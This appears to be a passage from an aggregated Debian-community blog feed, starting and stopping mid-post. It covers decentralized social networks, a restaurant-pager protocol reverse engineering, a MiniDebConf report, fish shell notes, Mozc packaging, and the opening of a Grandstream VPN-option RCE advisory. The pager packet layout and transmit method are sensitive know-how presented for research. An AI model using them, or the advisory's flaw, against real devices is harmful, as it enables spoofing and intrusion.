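       '?handle=ottoke.bsky.social')
with urllib.request.urlopen(url) as response:
    print(json.load(response))  # e.g. {"did": "did:plc:..."}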

Example Message in AT Protocol (JSON Format)
{
  "repo": "did:plc:ottoke.bsky.social",
  "collection": "app.bsky.feed.post",
  "record": {
    "$type": "app.bsky.feed.post",
    "text": "Hello from Bluesky!",
    "createdAt": "2025-03-03T12:00:00Z",
    "langs": ["en"]
  }
}

Popularity: Hybrid approach may have business benefits? Bluesky reported over 3 million users by 2024, probably getting traction due to its Twitter-like interface and Jack Dorsey's involvement. Its hybrid approach (decentralized identity with centralized components) could make it a strong candidate for mainstream adoption, assuming it can scale effectively.

3. Warpcast (Farcaster Network) Farcaster was launched in 2021 by Dan Romero and Varun Srinivasan, both former executives of the crypto exchange Coinbase, to create a decentralized but user-friendly social network. Built on the Ethereum blockchain, it could potentially offer a very attack-resistant communication medium. However, in my own testing, Farcaster does not seem to fully leverage what Ethereum could offer. First of all, there is no diversity in programs implementing the protocol, as at the moment there is only Warpcast. In Warpcast the signup requires an initial 5 USD fee that is not payable in ETH, and users need to create a new wallet address on the Ethereum layer 2 network Base instead of simply reusing their existing Ethereum wallet address or ENS name. Despite this, I can understand why Farcaster may have decided to start out like this. Having a single client program may be the best strategy initially. Matthew Hodgson, one of the founders of the decentralized chat protocol Matrix, shared in his FOSDEM 2025 talk that he slightly regrets focusing too much on developing the protocol instead of making sure the app that uses it is attractive to end users. So it may be sensible to ensure Warpcast gets popular first, before attempting to make the Farcaster protocol widely used. As a protocol, Farcaster's hybrid approach makes it more scalable than fully on-chain networks, giving it a higher chance of mainstream adoption if it integrates seamlessly with broader Web3 ecosystems.
  • Identity: ENS (Ethereum Name Service) domains are used as usernames.
  • Storage: Messages are stored in off-chain hubs, while identity is on-chain.
  • Cost: Users must pay gas fees for some operations but reading and posting messages is mostly free.

Example Message in Farcaster (JSON Format)
{
  "fid": 766579,
  "username": "ottok",
  "custodyAddress": "0x127853e48be3870172baa4215d63b6d815d18f21",
  "connectedWallet": "0x3ebe43aa3ae5b891ca1577d9c49563c0cee8da88",
  "text": "Hello from Farcaster!",
  "publishedAt": 1709424000,
  "replyTo": null,
  "embeds": []
}

Popularity: Decentralized social media + decentralized payments a winning combo? Ethereum founder Vitalik Buterin (warpcast.com/vbuterin) and many core developers are active on the platform. Warpcast, the main client for Farcaster, has seen increasing adoption, especially among Ethereum developers and Web3 enthusiasts. I too have a profile at warpcast.com/ottok. However, the numbers are still very low and far from reaching the network effects needed to really take off. Blockchain-based social media networks, particularly those built on Ethereum, are compelling because they leverage existing user wallets and persistent identities while enabling native payment functionality. When combined with decentralized content funding through micropayments, these blockchain-backed social networks could offer unique advantages that centralized platforms may find difficult to replicate, being decentralized both as a technical network and in their funding mechanism.

4. Hey.xyz (Lens Network) The Lens Protocol was developed by decentralized finance (DeFi) team Aave and launched in May 2022 to provide a user-owned social media network. While initially built on Polygon, it has since launched its own Layer 2 network called the Lens Network in February 2024. Lens is currently the main competitor to Farcaster. Lens stores profile ownership and references on-chain, while content is stored on IPFS/Arweave, enabling composability with DeFi and NFTs.
  • Identity: Profile ownership is tied to NFTs on the Polygon blockchain.
  • Storage: Content references are on-chain, while the content itself is stored on IPFS/Arweave (like NFTs).
  • Cost: Users must pay gas fees for some operations but reading and posting messages is mostly free.

Example Message in Lens (JSON Format)
{
  "profileId": "@ottok",
  "contentURI": "ar://QmExampleHash",
  "collectModule": "0x23b9467334bEb345aAa6fd1545538F3d54436e96",
  "referenceModule": "0x0000000000000000000000000000000000000000",
  "timestamp": 1709558400
}

Popularity: Probably not as social media site, but maybe as protocol? The social media side of Lens is mainly the Hey.xyz website, which seems to have fewer users than Warpcast, and is even further away from reaching critical mass for network effects. The Lens protocol however has a lot of advanced features and it may gain adoption as the building block for many Web3 apps.

5. Primal.net (Nostr Network) Nostr (Notes and Other Stuff Transmitted by Relays) was conceptualized in 2020 by an anonymous developer known as fiatjaf. One of the primary design tenets was to be a censorship-resistant protocol, and it is popular among Bitcoin enthusiasts, with Jack Dorsey being one of the public supporters. Unlike the Farcaster and Lens protocols, Nostr is not blockchain-based but just a network of relay servers for message distribution. It does, however, use public key cryptography for identities, similar to how wallets work in crypto.
  • Identity: Public-private key pairs define identity (with prefix npub...).
  • Storage: Content is federated among multiple servers, which in Nostr vocabulary are called relays.
  • Cost: No gas fees, but relies on relay operators willing to run the servers.

Example Message in Nostr (JSON Format)
{
  "id": "note1xyz...",
  "pubkey": "npub1...",
  "kind": 1,
  "content": "Hello from Nostr!",
  "created_at": 1709558400,
  "tags": [],
  "sig": "sig1..."
}

Popularity: If Jack Dorsey and Bitcoiners promote it enough? Primal.net as a web app is pretty solid, but it does not stand out much. While Jack Dorsey has shown support by donating $1.5 million to the protocol development in December 2021, its success likely depends on broader adoption by the Bitcoin community.
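Worth noting: the id and sig fields in the example above are what let Nostr stay verifiable without a blockchain. Per the NIP-01 specification, the event id is the SHA-256 hash of a canonical JSON serialization of the event, which any relay or client can recompute; a minimal sketch of that derivation (the pubkey here is a placeholder, not a real key):

import hashlib
import json

def nostr_event_id(pubkey_hex, created_at, kind, tags, content):
    # NIP-01: id = sha256 over the serialized array
    # [0, <pubkey>, <created_at>, <kind>, <tags>, <content>]
    payload = json.dumps([0, pubkey_hex, created_at, kind, tags, content],
                         separators=(',', ':'), ensure_ascii=False)
    return hashlib.sha256(payload.encode('utf-8')).hexdigest()

print(nostr_event_id('ab' * 32, 1709558400, 1, [], 'Hello from Nostr!'))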

Will any of these replace X/Twitter? As usage patterns vary, the statistics are not fully comparable, but this snapshot of the situation in March 2025 gives a decent overview.
Platform  | Total Accounts | Active Users | Growth Trend
Mastodon  | ~10 million    | ~1 million   | Steady
Bluesky   | ~33 million    | ~1 million   | Steady
Nostr     | ~41 million    | ~20 thousand | Steady
Farcaster | ~850 thousand  | ~50 thousand | Flat
Lens      | ~140 thousand  | ~20 thousand | Flat
Mastodon and Bluesky have already reached millions of users, while Lens and Farcaster are growing within crypto communities. It is however clear that none of these are anywhere close to how popular X/Twitter is. In particular, Mastodon had a huge influx of users in the fall of 2022 when Twitter was acquired, but to challenge the incumbents the growth would need to accelerate significantly. We can all accelerate this development by embracing decentralized social media now, alongside the existing dominant platforms. Who knows: given the right circumstances, maybe X.com leadership decides to change the operating model and start federating content to break out of the walled garden model. The likelihood of such a development would increase if decentralized networks get popular, and the incumbents feel they need to participate to not lose out.

Past and future The idea of decentralized social media is not new. One early pioneer, identi.ca, launched in 2008, only two years after Twitter, using the OStatus protocol to promote decentralization. A few years later it evolved into pump.io with the ActivityPump protocol, and also forked into GNU Social, which continued with OStatus. I remember when these happened, and also when Diaspora launched in 2010 with fairly large publicity. Surprisingly, both still operate (I can still post on both identi.ca and diasp.org), but the activity fizzled out years ago. The protocol however partially survived and evolved into ActivityPub, which is now the backbone of the Fediverse. The evolution of decentralized social media over the next decade will likely parallel developments in democracy, freedom of speech and public discourse. While the early 2010s emphasized maximum independence and freedom, the late 2010s saw growing support for content moderation to combat misinformation. The AI era introduces new challenges, potentially requiring proof-of-humanity verification for content authenticity. Key factors that will determine success:
  • User experience and ease of onboarding
  • Network effects and critical mass of users
  • Integration with existing web3 infrastructure
  • Balance between decentralization and usability
  • Sustainable economic models for infrastructure
This is clearly an area of development worth monitoring closely, as the next few years may determine which protocol becomes the de facto standard for decentralized social communication.

4 March 2025

Paul Tagliamonte: Reverse Engineering (another) Restaurant Pager system

Some of you may remember that I recently felt a bit underwhelmed by the last pager I reverse engineered, the Retekess TD-158, mostly due to how intuitive their design decisions were. It was pretty easy to jump to conclusions because they had made some pretty good decisions on how to do things. I figured I'd spin the wheel again and try a new pager system; this time I went for a SU-68G-10 pager, since I recognized the form factor as another fairly common unit I've seen around town. Off to Amazon I went, bought a set, and got to work trying to track down the FCC filings on this model. I eventually found what seemed to be the right make/model, and it, once again, indicated that this system should be operating in the 433 MHz ISM band, likely using OOK modulation. So, figured I'd start with the center of the band (again) at 433.92 MHz, take a capture, test my luck, and was greeted with a now very familiar sight. Same as the last go-arounds, except the preamble here is a 0 symbol followed by 6-ish symbol durations of no data, followed by 25 bits of a packet. Careful readers will observe 26 symbols above after the preamble; I did too! The last 0 in the screenshot above is not actually a part of the packet; rather, it's part of the next packet's preamble. Each packet is packed in pretty tight.

By Hand Demodulation Going off the same premise as last time, I figured I'd give it a manual demod and see what shakes out (again). This is now the third time I've run this play, so check out either of my prior two posts for a better written description of what's going on here; I'll skip all the details since I'd just be copy-pasting from those posts into here. Long story short, I demodulated a call for pager 1, a call for pager 10, and a power off command.
What      Bits
Call 1    1101111111100100100000000
Call 10   1101111111100100010100000
Off       1101111111100111101101110
A few things jump out at me here: the first 14 bits are fixed (in my case, 11011111111001), which means some mix of preamble, system id, or other system-wide constant. Additionally, the last 9 bits also look like they are our pager; the 1 and 10 pager numbers (LSB bit order) jump right out (100000000 and 010100000, respectively). That just leaves the two remaining bits, which look to be the action: 00 for a Call, and 11 for a Power off. I don't super love this, since the command has two bits rather than one, the base station ID seems really long, and a 9-bit Pager ID is just weird. Also, what is up with that power-off pager id? Weird. So, let's go and see what we can do to narrow down and confirm things by hand.

Testing bit flips Rather than call it a day at that, I figured it was worth a bit of diligence to make sure it's all correct, so I figured we should try sending packets to my pagers and see how they react to different messages after flipping bits in parts of the packet. I implemented a simple base station for the pagers using my Ettus B210mini, and threw together a simple OOK modulator and transmitter program which allows me to send specifically crafted test packets on frequency. Implementing the base station is pretty straightforward: because of the modulation of the signal (OOK), it's mostly a matter of setting a buffer to 1 and 0 for where the carrier signal is on or off, timed to the sample rate, and sending that off to the radio. If you're interested in a more detailed writeup on the steps involved, there's a bit more in my christmas tree post. First off, I'd like to check the base id. I want to know if all the bits in what I'm calling the base id are truly part of the base station ID, or perhaps they have some other purpose (version, preamble?). I wound up following a three-step process for every base station id:
  • Starting with an unmodified call packet for the pager under test:
    • Flip the Nth bit, and transmit the call. See if the pager reacts.
    • Hold "SET", and pair the pager with the new packet.
    • Transmit the call. See if the pager reacts.
    • After re-setting the ID, transmit the call with the physical base station, see if the pager reacts.
  • Starting with an unmodified off packet for the pager system
  • Flip the Nth bit, transmit the off, see if the pager reacts.
What wound up happening is that changing any bit in the first 14 bits meant that the packet no longer worked with any pager until it was re-paired, at which point it began to work again. This likely means the first 14 bits are part of the base station ID, and not some static constant shared between base stations, like a version field. All bits appear to be used. I repeated the same process with the command bits, and found that only 11 and 00 caused the pagers to react for the pager ids I've tried. I repeated this process one last time with the pager id bits, and found the last bit in the packet isn't part of the pager ID, and can be either a 1 or a 0 and still cause the pager to react as if it were a 0. This means that the last bit is unknown, but it has no impact on either a power off or call, and all messages sent by my base station always have a 0 set. It's not clear if this is used by anything; likely not, since setting a bit there doesn't result in any change of behavior I can see yet.

Final Packet Structure After playing around with flipping bits and testing, here is the final structure I came up with, based on the behavior observed while transmitting hand-crafted packets and watching pagers buzz:
base id (14 bits) | command (2 bits) | pager id (8 bits) | ??? (1 bit)
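As a sanity check of that layout, here is a little decoder sketch (mine, not part of the original analysis) that splits the three packets from the table above into these fields, using the 14/2/8/1 bit widths and the LSB-first pager id discussed earlier:

def decode(packet):
    # Split a 25-bit packet into the fields described above.
    assert len(packet) == 25
    base_id = packet[0:14]                  # fixed per base station
    command = packet[14:16]                 # 00 = call, 11 = off
    pager_id = int(packet[16:24][::-1], 2)  # 8 bits, LSB-first
    unknown = packet[24]                    # the trailing mystery bit
    return base_id, command, pager_id, unknown

for pkt in ("1101111111100100100000000",   # call 1
            "1101111111100100010100000",   # call 10
            "1101111111100111101101110"):  # off (pager id 0xED / 237)
    print(decode(pkt))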

Commands The command section comes in two flavors: either a call or an off command.
Type  Id (2 bits)  Description
Call  00           Call the pager identified by the id in pager id
Off   11           Request pagers power off; pager id is always 10110111
As for the actual RF PHY characteristics, here are my best guesses at what's going on:
What              Description
Center Frequency  433.92 MHz
Modulation        OOK
Symbol Duration   1300us
Bits              25
Preamble          325us of carrier, followed by 8800us of no carrier
I'm not 100% on the timings, but they appear to be close enough to work reliably. Same with the center frequency: it's roughly right, but there may be a slight difference I'm missing.
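To make the "set a buffer to 1 and 0" idea from earlier concrete, here is a toy sketch of the envelope generation; the timings come from the table above, and the assumption that a 1 bit simply means carrier-on for a whole symbol is mine:

SAMPLE_RATE = 1_000_000  # 1 Msps keeps the microsecond math trivial

def us(n):
    # Convert microseconds to a sample count at SAMPLE_RATE.
    return n * SAMPLE_RATE // 1_000_000

def ook_envelope(bits):
    # Amplitude envelope (1 = carrier on, 0 = carrier off) for one packet:
    # 325us of carrier, 8800us of silence, then 1300us per bit.
    buf = [1] * us(325) + [0] * us(8800)
    for b in bits:
        buf += [int(b)] * us(1300)
    return buf  # multiply by a carrier and hand the samples to the radio

env = ook_envelope("1101111111100100100000000")
print(len(env) / SAMPLE_RATE, "seconds of envelope")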

Lingering Questions This was all generally pretty understandable: another system that had some good decisions and wasn't too bad to reverse engineer. This one was a bit more fun, since there was a bit more ambiguity that needed some follow-up to confirm things. I am left with a few questions, though, which I'm kinda interested in understanding, but I'll likely need a lot more data and/or original source: Why is the command two bits here? This was a bit tough to understand because of the number of bits they have at their disposal: given the one last bit at the end of the packet that doesn't seem to do anything, there's no reason this couldn't have been a 16 bit base station id and an 8 bit pager id along with a single bit command (call or off). When sending an off, why is power off that bit pattern? Other pager IDs don't seem to work with off, so it has some meaning, but I'm not sure what that is. You press and hold 9 on the physical base station, but the code winds up coming out to 0xED, 237, or maybe -19 if it's signed. I can't quite figure out why it's this value. Are there other codes? Finally, what's up with the last bit? Why is it 25 bits and not 24? It must take more work to process something that isn't 8-bit aligned, and all for something that's not being used!

1 March 2025

Debian Brasil: MiniDebConf Belo Horizonte 2024 - a brief report


From April 27th to 30th, 2024, MiniDebConf Belo Horizonte 2024 was held at the Pampulha Campus of UFMG - Federal University of Minas Gerais, in Belo Horizonte city. This was the fifth time that a MiniDebConf (as an exclusive in-person event about Debian) took place in Brazil. Previous editions were in Curitiba (2016, 2017, and 2018), and in Brasília in 2023. We had other MiniDebConf editions held within Free Software events such as FISL and Latinoware, and other online events. See our event history. Parallel to MiniDebConf, on the 27th (Saturday) FLISOL - Latin American Free Software Installation Festival took place. It's the largest event in Latin America to promote Free Software, and it has been held since 2005 simultaneously in several cities. MiniDebConf Belo Horizonte 2024 was a success (as were previous editions) thanks to the participation of everyone, regardless of their level of knowledge about Debian. We value the presence of both beginner users who are familiarizing themselves with the system and the official project developers. The spirit of welcome and collaboration was present during the whole event. 2024 edition numbers: During the four days of the event, several activities took place for all levels of users and collaborators of the Debian project. The official schedule was composed of: The final numbers for MiniDebConf Belo Horizonte 2024 show that we had a record number of participants. Of the 224 participants, 15 were official Brazilian contributors, 10 being DDs (Debian Developers) and 5 DMs (Debian Maintainers), in addition to several unofficial contributors. The organization was carried out by 14 people who started working at the end of 2023, including Prof. Loïc Cerf from the Computing Department who made the event possible at UFMG, and 37 volunteers who helped during the event. As MiniDebConf was held at UFMG facilities, we had the help of more than 10 University employees. See the list with the names of people who helped in some way in organizing MiniDebConf Belo Horizonte 2024. The difference between the number of people registered and the number of attendees at the event is probably explained by the fact that there is no registration fee, so if a person decides not to go to the event, they will not suffer financial losses. The 2024 edition of MiniDebConf Belo Horizonte was truly grand and shows the result of the constant efforts made over the last few years to attract more contributors to the Debian community in Brazil. With each edition the numbers only increase, with more attendees, more activities, more rooms, and more sponsors/supporters.

Activities The MiniDebConf schedule was intense and diverse. On the 27th, 29th and 30th (Saturday, Monday and Tuesday) we had talks, discussions, workshops and many practical activities. On the 28th (Sunday), the Day Trip took place, a day dedicated to sightseeing around the city. In the morning we left the hotel and went, on a chartered bus, to the Belo Horizonte Central Market. People took the opportunity to buy various things such as cheeses, sweets, cachaças and souvenirs, as well as tasting some local foods. After a 2-hour tour of the Market, we got back on the bus and hit the road for lunch at a typical Minas Gerais food restaurant. With everyone well fed, we returned to Belo Horizonte to visit the city's main tourist attraction: Lagoa da Pampulha and Capela São Francisco de Assis, better known as Igrejinha da Pampulha. We went back to the hotel and the day ended in the hacker space that we set up in the events room for people to chat, package, and eat pizzas. Crowdfunding For the third time we ran a crowdfunding campaign and it was incredible how people contributed! The initial goal was to raise the amount equivalent to a gold tier of R$ 3,000.00. When we reached this goal, we defined a new one, equivalent to one gold tier + one silver tier (R$ 5,000.00). And again we achieved this goal. So we proposed as a final goal the value of a gold + silver + bronze tiers, which would be equivalent to R$ 6,000.00. The result was that we raised R$ 7,239.65 (~ USD 1,400) with the help of more than 100 people! Thank you very much to the people who contributed any amount. As a thank you, we list the names of the people who donated. Food, accommodation and/or travel grants for participants Each edition of MiniDebConf brought some innovation, or some different benefit for the attendees. In this year's edition in Belo Horizonte, as with DebConfs, we offered bursaries for food, accommodation and/or travel to help those people who would like to come to the event but who would need some kind of help. In the registration form, we included the option for the person to request a food, accommodation and/or travel bursary, but to do so, they would have to identify themselves as a contributor (official or unofficial) to Debian and write a justification for the request. Number of people benefited: The food bursary provided lunch and dinner every day. The lunches included attendees who live in Belo Horizonte and the region. Dinners were paid for attendees who also received accommodation and/or travel. The accommodation was at the BH Jaraguá Hotel. And the travel grants included airplane or bus tickets, or fuel (for those who came by car or motorbike). Much of the money to fund the bursaries came from the Debian Project, mainly for travel. We sent a budget request to the former Debian leader Jonathan Carter, and he promptly approved our request. In addition to this event budget, the leader also approved individual requests sent by some DDs who preferred to request directly from him. The experience of offering the bursaries was really good because it allowed several people to come from other cities.
Photos and videos You can watch recordings of the talks at the links below: Thanks We would like to thank all the attendees, organizers, volunteers, sponsors and supporters who contributed to the success of MiniDebConf Belo Horizonte 2024. Sponsors Gold: Silver: Bronze: Organizers

28 February 2025

Antoine Beaupr : testing the fish shell

I have been testing fish for a couple months now (this file started on 2025-01-03T23:52:15-0500 according to stat(1)), and those are my notes. I suspect people will have Opinions about my comments here. Do not comment unless you have some Constructive feedback to provide: I don't want to know if you think I am holding it Wrong. Consider that I might have used UNIX shells for longer than you have lived. I'm not sure I'll keep using fish, but so far it's the first shell that survived heavy use outside of zsh(1) (unless you count tcsh(1), but that was in another millennium). My normal shell is bash(1), and it's still the shell I use everywhere other than my laptop, as I haven't switched on all the servers I manage, although it is available since August 2022 on torproject.org servers. I first got interested in fish because it was ported to Rust, making it one of the rare shells out there written in a "safe" and modern programming language, released after an impressive ~2 years of work with Fish 4.0.

Cool things Current directory gets shortened: ~/wikis/anarc.at/software/desktop/wayland shows up as ~/w/a/s/d/wayland. Autocompletion rocks. Default prompt rocks. Doesn't seem vulnerable to command injection assaults, at least it doesn't trip on the git-landmine. It even includes pipe status output, which was a huge pain to implement in bash. Made me realize that if the last command succeeds, we don't see other failures, which is the case with my current prompt anyways! Signal reporting is better than my bash implementation too. So far the only modification I have made to the prompt is to add a printf '\a' to output a bell. By default, fish keeps a directory history (but separate from the pushd stack), that can be navigated with cdh, prevd, and nextd; dirh shows the history.

Less cool I feel there's visible latency in the prompt creation. POSIX-style functions (foo() { true; }) are unsupported. Instead, fish uses whitespace-sensitive definitions like this:
function foo
    true
end
This means my (modest) collection of POSIX functions needs to be ported to fish. Workaround: simple functions can be turned into aliases, which fish supports (but implements using functions). EOF heredocs are considered to be "minor syntactic sugar". I find them frigging useful. Process substitution is split on newlines, not whitespace. You need to pipe through string split -n " " to get the equivalent. <(cmd) doesn't exist: they claim you can use cmd | foo - as a replacement, but that's not correct: I used <(cmd) mostly where foo does not support - as a magic character to say 'read from stdin'. Documentation is... limited. It seems mostly geared towards the web docs, which are... okay (but I couldn't find out about ~/.config/fish/conf.d there!), but this is really inconvenient when you're trying to browse the manual pages. For example, fish thinks there's a fish_prompt manual page, according to its own completion mechanism, but man(1) cannot find that manual page. I can't find the manual for the time command (which is actually a keyword!). Fish renders multi-line commands with newlines. So if your terminal looks like this, say:
anarcat@angela:~> sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
... but it's actually one line, when you copy-paste the above, in foot(1), it will show up exactly like this, newlines and all:
sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
Whereas it should show up like this:
sq keyring merge torproject-keyring/lavamind-95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyring/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
Note that this is an issue specific to foot(1), alacritty(1) and gnome-terminal(1) don't suffer from that issue. I have already filed it upstream in foot and it is apparently fixed already. Globbing is driving me nuts. You can't pass a * to a command unless fish agrees it's going to match something. You need to escape it if it doesn't immediately match, and then you need the called command to actually support globbing. 202[345] doesn't match folders named 2023, 2024, 2025, it will send the string 202[345] to the command.

Blockers () is like $(): it's process substitution, and not a subshell. This is really impractical: I use ( cd foo ; do_something) all the time to avoid losing the current directory... I guess I'm supposed to use pushd for this, but ouch. This wouldn't be so bad if it was just for cd though. Clean constructs like this:
( git grep -l '^#!/.*bin/python' ; fdfind .py ) | sort -u
Turn into what i find rather horrible:
begin; git grep -l '^#!/.*bin/python' ; fdfind .py ; end | sort -u
It... works, but it goes back to "oh dear, now there's a new language again". I only found out about this construct while trying:
{ git grep -l '^#!/.*bin/python' ; fdfind .py } | sort -u
... which fails and suggests using begin/end, at which point: why not just support the curly braces? FOO=bar is not allowed. It's actually recognized syntax, but creates a warning. We're supposed to use set foo bar instead. This really feels like a needless divergence from the standard. Aliases are... peculiar. Typical constructs like alias mv="\mv -i" don't work because fish treats aliases as a function definition, and \ is not magical there. This can be worked around by specifying the full path to the command, with e.g. alias mv="/bin/mv -i". Another problem is trying to override a built-in, which seems completely impossible. In my case, I like the time(1) command the way it is, thank you very much, and fish provides no way to bypass that builtin. It is possible to call time(1) with command time, but it's not possible to replace the command keyword, so that means a lot of typing. Again: you can't use \ to bypass aliases. This is a huge annoyance for me. I would need to learn to type command in long form, and I use that stuff pretty regularly. I guess I could alias command to c or something, but this is one of those huge muscle memory challenges. Alt-. doesn't always work the way I expect.

23 February 2025

Kentaro Hayashi: Short journey to Mozc 2.29.5160.102+dfsg-1

Introduction This is a note about how I upgraded the Mozc package last year to get it ready for the upcoming trixie release (with many restrictions). Maybe Mozc 2.29.5160.102+dfsg-1.3 will be shipped with Debian 13 (trixie).

FTBFS with Mozc 2.28.4715.102+dfsg-2.2 In May 2024, I found that Mozc had been removed from testing and was still FTBFS. #1068186 - mozc: FTBFS with abseil 20230802: ../../base/init_mozc.cc:90:29: error: absl::debian5::flags_internal::ArgvListAction has not been declared - Debian Bug report logs That FTBFS was fixed in the Mozc upstream, but the fix was not applied in Debian for a while. Not only the upstream patch but also an additional linkage patch was required to fix it. Mozc is the de facto standard input method editor for Japanese. Most Japanese users use it by default on the Linux desktop. (Even though the frontend input method framework differs, the background engine is Mozc in most cases: uim-mozc for task-japanese-desktop, ibus-mozc for task-japanese-gnome-desktop in Debian.) There are cases where Mozc is re-built locally with an integrated external dictionary to improve the vocabulary. If the FTBFS had kept ongoing, it would have blocked such usage. So I sent patches to fix it and they were merged.

Motivation to update Mozc While fixing #1068186, I also found that the Mozc version had not been synced to upstream for a long time. At that time, Mozc in unstable was version 2.28.4715.102+dfsg, but upstream had already released 2.30.5544.102. It seemed that Mozc's maintainer was too busy and couldn't afford to update it, so I tried to do it.

The blockers for updating Mozc But it was not an easy task. If you wanted to package the latest Mozc, there were many blockers.
  • Newer Mozc requires Bazel to build, but there is no Bazel package that fits (there is bazel-bootstrap 4.x, but it's old; v6.x or newer is required)
  • Newer abseil and protobuf were required
  • Renderer was changed to Qt. GTK renderer was removed
  • Revise existing patchsets (e.g. for UIM, for Fcitx)
That was not all.

Road to latest Mozc First, I knew of the existence of debian-bazel, so I posted to ask about bazel-packaging progress: Any updates about bazel packaging effort? Sadly there was no response. Thus, it was not realistic to adopt Bazel as the build tool chain. In other words, we needed to keep the GYP patch and maintain it. As another topic, upstream changed the renderer from GTK+ to Qt. Here are the major topics of each release of Mozc.
  • 2.30.5544.102 Require abseil 20240116.1 or later
  • 2.29.5544.102 GYP was deprecated
  • 2.29.5374.102
  • 2.29.5268.102 No gtk renderer anymore, need Qt.
  • 2.29.5160.102
    • The last version that gtk renderer is available.
    • --use_gyp_for_ibus_build option was removed.
  • 2.28.5029.102
  • 2.28.4880.102
  • 2.28.4715.102+dfsg Debian sid
The internal renderer changes were too big, and even before GYP's deprecation in 2.29.5544.102, GYP support had already been removed gradually. As a result, targeting 2.29.5160.102 was the practical approach to move things forward.

Revisit existing patchsets for 2.28.4715.102+dfsg Second, I needed to revisit the existing patchsets to triage them.
  • 0001-Update-uim-mozc-to-c979f127acaeb7b35d3344e8b1e40848e.patch
    • Required
  • 0002-Support-fcitx.patch
    • Required
  • 0003-Change-compiler-from-clang-to-gcc.patch
  • 0004-Add-usage_dict.txt.patch
    • Required. (maybe)
  • 0005-Enable-verbose-build.patch
    • Required.
  • 0006-Update-gyp-using-absl.patch
    • Required and need massive refactoring.
  • 0007-common.gypi-Use-command-v-instead-of-which.patch
    • (maybe) Not needed anymore
  • 0009-protobuf.gyp-Add-latomic-to-link_settings.patch
    • Required.
  • 0010-Fix-the-compile-error-of-ParseCommandLineFlags-with.patch
    • Required. Should be merged into 0006 patch.
  • 0011-Fix-missing-abseil-gyp-link-settings.patch
    • Required. Should be merged into 0006 patch.
The UIM patch was maintained in a third-party repository, and its directory structure was quite different from Mozc's. It seems that maintenance activity was too low, so just picking changes from macuim was not enough; additional fixes were required for the FTBFS. The Fcitx patch was also maintained in fcitx/mozc, but it tracks only the master branch, so it was hard to pick a patchset for a specific version of Mozc. Finally, I managed to refresh the patchset for 2.29.5160.102.
  • support-uim.patch
  • support-fcitx.patch
  • change-compiler-from-clang-to-gcc.patch
  • add-japanese-usage-dictionary.patch
  • enable-verbose-build.patch
  • update-gyp-using-system-abseil.patch
  • gyp-using-command-instead-of-which.patch
  • gyp-protobuf-link-with-atomic.patch
  • enable-deprecated-gtk-renderer.patch
  • fix-compile-error-of-ParseCommandLineFlags.patch
  • enable-use_gyp_for_ibus_build-again.patch
  • ibus-drop-needless-client_mock.patch
  • protobuf-revert-internal-cleanup.patch
  • uim-mozc-fix-ftbfs.patch

Improve packaging task Mozc needs to be repacked, but it didn't use Files-Excluded yet. So I introduced d/watch to repack the upstream source. It makes the source package more reproducible.

OT: Hardware breakage There was another blocker for this task. I hit a situation where g++ caused SEGV randomly during building Mozc. At first I wondered why it failed, but digging further, I finally found that a memory module was corrupted. Thus I lost 32GB of memory modules. :-<

Unexpected behaviour in uim-mozc When I uploaded Mozc 2.29.5160.102+dfsg-1 to experimental, I found a case where uim-mozc behaves weirdly: the candidate words were shown with flickering. But it was not a regression in this upload; uim-mozc with Wayland causes that problem. Thus GNOME and derivatives might not be affected because ibus-mozc will be used.

Mozc 2.29.5160.102+dfsg-1 As the patchset matured, I uploaded 2.29.5160.102+dfsg-1 with the --delayed 15 option.
$ dput --delayed 15 mozc_2.29.5160.102+dfsg-1_source.changes
Uploading mozc using ftp to ftp-master (host: ftp.upload.debian.org; directory: /pub/UploadQueue/DELAYED/15-day)
running allowed-distribution: check whether a local profile permits uploads to the target distribution
running protected-distribution: warn before uploading to distributions where a special policy applies
running checksum: verify checksums before uploading
running suite-mismatch: check the target distribution for common errors
running gpg: check GnuPG signatures before the upload
 signfile dsc mozc_2.29.5160.102+dfsg-1.dsc 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3
 fixup_buildinfo mozc_2.29.5160.102+dfsg-1.dsc mozc_2.29.5160.102+dfsg-1_amd64.buildinfo
 signfile buildinfo mozc_2.29.5160.102+dfsg-1_amd64.buildinfo 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3
 fixup_changes dsc mozc_2.29.5160.102+dfsg-1.dsc mozc_2.29.5160.102+dfsg-1_source.changes
 fixup_changes buildinfo mozc_2.29.5160.102+dfsg-1_amd64.buildinfo mozc_2.29.5160.102+dfsg-1_source.changes
 signfile changes mozc_2.29.5160.102+dfsg-1_source.changes 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3
Successfully signed dsc, buildinfo, changes files
Uploading mozc_2.29.5160.102+dfsg-1.dsc
Uploading mozc_2.29.5160.102+dfsg-1.debian.tar.xz
Uploading mozc_2.29.5160.102+dfsg-1_amd64.buildinfo
Uploading mozc_2.29.5160.102+dfsg-1_source.changes
Mozc 2.29.5160.102+dfsg-1 was landed to unstable at 2024-12-20.

Additional bug fixes Additionally, the following bugs were also fixed; these fixes landed in 2.29.5160.102+dfsg-1.1. Furthermore, I found that salsa CI succeeds even when the pristine-tar branch commit is missing. I've sent an MR for this issue and it has already been merged.

Mozc and future in Debian In this short journey, I gave up on updating to a newer Mozc because the versions of the dependency libraries were not updated. Note that protobuf 3.25.4 in experimental depends on the older absl 20230802, so it must be rebuilt against absl 20240722.0. Furthermore, we need to consider how to migrate from the GTK renderer to the Qt renderer in the future.

12 February 2025

Evgeni Golov: Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient. Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did
echo "$(nvram get 8460)" | sed 's/;/\n/g' >> ${CONF_FILE}
After the fix it does
